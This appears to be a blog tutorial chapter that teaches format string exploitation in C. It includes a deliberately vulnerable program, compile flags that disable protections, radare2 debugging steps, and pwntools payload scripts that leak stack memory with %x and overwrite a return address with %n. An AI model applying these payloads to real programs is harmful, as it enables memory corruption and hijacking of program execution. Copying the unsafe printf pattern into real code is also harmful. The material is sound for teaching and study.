Mastering Format String Exploits: A Comprehensive Guide

12 min read

November 5, 2023

Initiating Linux Binary Exploitation: A Beginner's Expedition into Code Manipulation
Mastering Format String Exploits: A Comprehensive Guide

Table of contents

Delving into Format String Vulnerabilities: An Educational Expedition

Welcome, cyber enthusiasts and aspiring security professionals! Today's chapter unfolds an intriguing aspect of cybersecurity – the format string vulnerability, a classic yet crucial topic in the realm of secure coding. My personal journey with this vulnerability holds a special place, as it was the first one I mastered, offering insights not just into code exploits but also into the broader landscape of software vulnerabilities.

In this chapter, we're set to embark on a comprehensive journey, starting from the very basics of what a format string is and how it functions in the C programming language. We'll see how a simple string formatting feature in printf can turn into a security vulnerability when influenced by user input.

Our expedition will take us through:

  1. The Anatomy of Format Strings: Understanding how format strings operate within printf, showcasing their standard use and potential pitfalls.
  2. Unveiling the Vulnerability: A step-by-step breakdown of how format strings can be exploited, using a sample C program as our testing ground.
  3. Exploit Development with Radare2: Employing the powerful binary analysis tool, radare2, we will analyze, debug, and manipulate our test program, gaining hands-on experience in exploit development.
  4. Crafting a Python Exploit: Translating our findings into a practical exploit script, showcasing the real-world application of our theoretical knowledge.
  5. Understanding the Risks: Highlighting the critical importance of secure coding practices and the potential consequences of overlooking format string vulnerabilities.

Whether you're a seasoned security professional or a curious novice, this chapter promises a blend of technical depth and accessible learning. By the end of our exploration, you'll not only understand the intricacies of format string vulnerabilities but also appreciate their significance in the broader context of cybersecurity. So, let's dive in and unravel the mysteries of format string vulnerabilities together!

Understanding Format Strings: The Basics of printf Functionality

Dive into the world of C programming where the format string stands as a key player in shaping the output of the printf function. Imagine you're working with the following C code:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv){
  char to_print[5] = "hello";
  printf("%s\n",to_print);
  printf("%x\n",to_print);
}

In this snippet, to_print is a friendly string that printf greets twice, each time with a different perspective. The %s specifier asks for a straightforward introduction in ASCII, while %x takes a more mysterious route, revealing the string's memory address in hexadecimal form.

Exemplify what is a format string

These format specifiers, %s and %x, are like secret codes that control how data is presented. There's a whole world of them, such as %d for integers, each adding its unique flavor to the output. But here's a twist: if an attacker gets the reins over these format strings, it's not just about changing presentations anymore—it could open up serious security loopholes. And guess what? We're about to explore this intriguing and risky avenue in our next section! Stay tuned.

Exploring the Intricacies of a Format String Vulnerability

Let's delve into the mechanics of a format string vulnerability, using a simple yet illustrative piece of C code. Picture this:

#include <stdio.h>
#include <string.h>

void vuln(char *vuln_param){
  int local_var = 0x123;
  char str[13] = "AAAABBBBCCCC\0";
  char to_print[6]  = "hello\0";
  printf(vuln_param, to_print);
}

int main(int argc, char **argv){
  vuln(argv[1]);
}

Here, we have a classic setup with two functions, main and vuln, where vuln gets a spotlight by main. The twist? The user-supplied argument directly enters the printf function, handing over an unusual level of control to an external user.

Inside, variables like local_var, str, and to_print are not just random data; they're key players setting the stage for our vulnerability exploration.

Now, let's compile this intriguing code:

gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o formatstring formatstring.c
Example of normal execution

Under normal circumstances, what you type is what you get on the screen. But what if we spice things up a bit? Enter %s or %x as format strings, and suddenly, printf unveils either to_print's content or its memory address.

Example introduction of format strings
Introduction of multiple format strings

But wait, there's more! What if we flood printf with a barrage of %xs? Surprise: a memory dump! Why does this happen? printf, in its diligent efforts, matches the number of format strings with arguments. Excess format strings lead to unintended memory revelations. For instance, enter enough %xs, and you'll see "42414141", the ASCII equivalent of "BAAA" - a peek into the str variable's memory.

Recognizing data

This diagram here simplifies what's happening when we overload printf with format strings, unlocking the potential to access hidden memory data.

Stack diagram

So, we've learned to unearth the process's in-memory secrets. But is that all? Can this vulnerability be leveraged further? Let's keep digging to find out!

Mastering the Art of Memory Manipulation: The Format String Offense

Diving into the realm of format string vulnerabilities, we encounter %n – a seemingly innocuous player that holds the power to write into memory. The printf function, often a benign utility, can turn into a hacker's canvas when %n comes into play, especially when influenced by external, user-provided data.

man 3 printf
💡
Code such as printf(foo); often indicates a bug, since foo may contain a % character. If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole. Code such as printf(foo); often indicates a bug, since foo may contain a % character. If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole.

The printf function, when fed with untrusted input containing %n, inadvertently becomes a tool to modify memory. This ability to write arbitrarily in memory opens up two intriguing pathways for exploitation:

  1. Variable Overwrite: Imagine being able to change the value of a variable within a program, potentially unlocking areas or functionalities that are meant to be off-limits.
  2. Return Address Hijacking: The more ambitious path – modifying the return address of a function to wrestle control over the program's execution flow.
Attack methodology

For today's exploration, our focus is laser-sharp on the latter: manipulating the function's return address. Here's the game plan:

  1. Insert the memory address containing the return address into printf.
  2. Scout for this address in the memory using %x.
  3. Once located, switch %x with %n to overwrite the return address.

Sounds complex? Fear not! We're about to break it down step by step, transforming this high-level strategy into an actionable exploit. Let's embark on this journey of memory manipulation!

Exploit Development

Crafting the Exploit: Navigating the Memory Maze

Embarking on the quest to develop an exploit for the format string vulnerability, the initial step is pinpointing the return address of the function. This critical detail lies within the recesses of the program's memory, and to uncover it, we turn to the trusty tool radare2.

r2 -d formatstring

Using radare2, we delve into the binary's structure, laying the groundwork for our exploit. The goal is to set a strategic breakpoint at the start of the vulnerable function.

We analyzed and found vulnerable function name
We set a breakpoint at the beginning of the function

Once reached, we employ the command "dc" to advance the program's execution to this point, allowing us to scrutinize the stack.

Memory address pointing to the return address

Our prize? The memory address where the function's return address resides. Visualized in red in the provided image, this address is the key to manipulating the program's execution flow. For clarity, observe how this address aligns with the next instruction after the vulnerable function's execution.

Return address

Constructing the Payload: A Step Towards Control

Equipped with the knowledge of the memory address containing the function's return address, we move to the next phase of our exploit: crafting a payload that harnesses this information.

Our Python script, leveraging the power of the pwn library, is succinct yet potent. The script constructs a payload that embeds the crucial memory address:

from pwn import *
import sys

payload = b""
payload += p32(0xffffd920)
sys.stdout.buffer.write(payload)

In this snippet, p32(0xffffd920) translates the memory address into a 32-bit little-endian format, which is the format expected by our vulnerable program. This payload is then outputted, ready to be fed into the program as input.

Memory address not displayable

When this payload is executed as an argument to our vulnerable program, it passes the memory address directly to printf. However, as it stands, this address is merely passed along - it won't display anything on its own since it's not a string or a recognizable format specifier.

Refining the Payload: Pinpointing the Return Address

The journey of exploit development now enters a crucial phase where precision and observation converge. Our objective is to locate and manipulate the return address within the program's memory, using the format string vulnerability. To achieve this, we refine our Python exploit further, incorporating "%x" format specifiers to traverse and inspect the program's memory space.

from pwn import *
import sys

payload = b""
payload += p32(0xffffd6e0)
payload += b"%x " * 190
sys.stdout.buffer.write(payload)
Recognizable patternRecognizable pattern

As depicted in the image above, a distinctive "pattern" begins to emerge from the yellow segment onwards. These values correspond to "%x".

Identify that it is "%x"

In simpler terms, we have successfully arrived at the memory section housing the first parameter we've supplied to printf.

Updated diagram

However, when we inspect the memory dump image, discerning the precise location of the return address becomes a formidable challenge. Hence, we shall employ a series of "A" characters to pad the way.

from pwn import *
import sys

payload = b"A" * 29
payload += p32(0xffffd6e0)
payload += b"%x " * 190
sys.stdout.buffer.write(payload)
Recognizing the memory address

Thanks to this padding, combined with the matching "%x" pattern, we can now approximate the whereabouts of the return address, which we must target with "%n." Our main objectives at this stage are twofold:

  1. Identify the exact "%x" that corresponds to the target address.
  2. Group the address into a single "%x" and subsequently transform it into "%n."

With these goals in mind, let's adapt our exploit to locate the crucial "%x."

from pwn import *
import sys

payload = b"A" * 29
payload += p32(0xffffd6e0)
payload += b"%x " * 190
payload += b"%x"
payload += b"B" * 34
sys.stdout.buffer.write(payload)
  • To start, we've introduced a separate "%x," which we will later convert to "%n."
  • Additionally, we've appended padding "B" characters to ensure proper alignment of values, ensuring that the memory address we've injected remains a unique "%x."
💡
At this juncture, I recommend executing the exploit directly with radare2 to scrutinize its behavior.

Upon running the script, we notice that we still have a considerable number of "%x" ahead. Therefore, further adjustments and fine-tuning are required.

Entering the padding at the end with "B"

When you reach the point where the "%x" stops displaying memory address values, it's time to refine the count of "B" characters at the end. In my case, the exploit has settled at 171 "%x."

from pwn import *
import sys

payload = b"A"*29
payload += p32(0xffffd6e0)
payload += b"%x " * 170
payload += b"%x"
payload += b"B"* 34
sys.stdout.buffer.write(payload)
We finish finding the %x

As we execute this script, we observe the memory dump and make iterative adjustments to the number of "%x" and "B"s, striving for an alignment that places our target address precisely within a single "%x". This meticulous process involves running the script multiple times, each time tweaking the payload slightly:

from pwn import *
import sys

payload = b"A"*29
payload += p32(0xffffd6e0)
payload += b"%x " * 170
payload += b"%x"
payload += b"B"* 30
sys.stdout.buffer.write(payload)
%x number 171

When the alignment is perfected, the targeted "%x" now precisely corresponds to our injected memory address. This setup is verified by placing a breakpoint just before the function returns and inspecting the stack. The modification of the return address becomes evident, signifying our successful manipulation.

Breakpoint just before leaving the vulnerable function
Evidence of modification of return address

Continuing the execution post-modification leads to an error - a clear indication of our exploit's impact. We have effectively altered the program's execution flow, demonstrating the potency of format string vulnerabilities.

Change of the return address

Concluding Insights: The Power and Risks of Format String Vulnerabilities

In this exploration of format string vulnerabilities, we've delved deep into the mechanics and implications of this classic yet potent security flaw. Our journey illuminated the dual aspects of format strings in C programming: their utility in formatting outputs and their potential as a security vulnerability when improperly managed.

Key Takeaways:

  1. Understanding Format Strings: We began by understanding the basic role of format strings in functions like printf, where they dictate how variables are displayed. The seemingly benign use of %s for strings or %x for hexadecimal values, when user-controlled, opened the door to memory manipulation.
  2. Vulnerability in Action: Through a hands-on example, we witnessed how user-controlled format strings could lead to memory dumps. The printf function's expectation of matching format strings and arguments, when unmet, inadvertently led to revealing or altering memory contents.
  3. Crafting the Exploit: The real crux of our journey was developing an exploit. We methodically constructed a Python script to exploit the vulnerability, showcasing each step from injecting memory addresses to locating and modifying the return address of a function.
  4. Radare2 as a Tool: Utilizing radare2, a powerful binary analysis tool, we analyzed and debugged our vulnerable program. This process was instrumental in understanding the stack's behavior and refining our exploit.
  5. Exploitation Strategy: Our exploit strategically used %n, a format specifier that allows writing to memory, turning a simple output function into a potent tool for altering a program's execution flow.
  6. Implications and Caution: This exploration underscores the significance of validating and sanitizing user input, particularly in functions that handle format strings. It serves as a reminder of the delicate balance between functionality and security in programming.

In summary, the format string vulnerability offers a compelling case study in cybersecurity. It exemplifies how a fundamental aspect of programming can be twisted into a security threat, reminding us of the constant vigilance required in the digital realm. Our hands-on approach not only unveiled the technicalities of exploiting this vulnerability but also highlighted the broader implications for secure coding practices. As we conclude this chapter, we are left with a deeper appreciation for the intricacies of cybersecurity and the ever-evolving challenge of protecting digital systems.

Tips of the article

What is format string ?

A format string is nothing more than a way for the "printf" function to set the output format that a given value will take. For example, %x is used to display the value in hexadecimal while %s is used in ASCII.

What are the consequences of passing user-controlled parameters to printf?
  • It may cause you to enter multiple "%x" so that it dumps the entire contents of memory.
  • Secondly, it can cause an attacker to enter "%n" and thus be able to modify values in memory.
What is the main thing an attacker can look for by modifying values with format string?
  • You may be looking to modify the return address of a function.
  • You may be looking to modify the value of a particular variable to change the execution flow of a program.
Could you tell me what are the key points to look at when we are exploiting this vulnerability and we want to modify the return address?
Attack methodology

Resources

Vulnerabilidades Format String · Guía de exploits

Chapters

Botón Anterior
Advanced Exploits: Overcoming Restrictions with GOT and PLT

Previous chapter

Mastering Binary Exploitation: Unleashing the Power of Format String and Buffer Overflow

Next chapter